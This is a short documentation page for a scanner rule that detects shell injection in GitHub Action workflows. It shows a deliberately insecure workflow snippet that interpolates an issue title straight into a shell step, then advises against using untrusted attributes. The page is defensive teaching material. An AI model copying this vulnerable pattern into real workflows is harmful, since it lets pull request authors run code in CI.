Skip to content

GitHub Action with shell injection

Checks for GitHub Action workflows where untrusted attributes controllable by the Pull Request author could like to code execution.

Examples

Insecure Example

on:
  pull_request:
jobs:
  docker-build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Show issue title
        run: |
          echo "${{ github.event.issue.title }}" # This is subject to shell injection

Secure Example

Avoid using untrusted, arbitrarily user-controllable attributes directly. Especially not in shell scripts.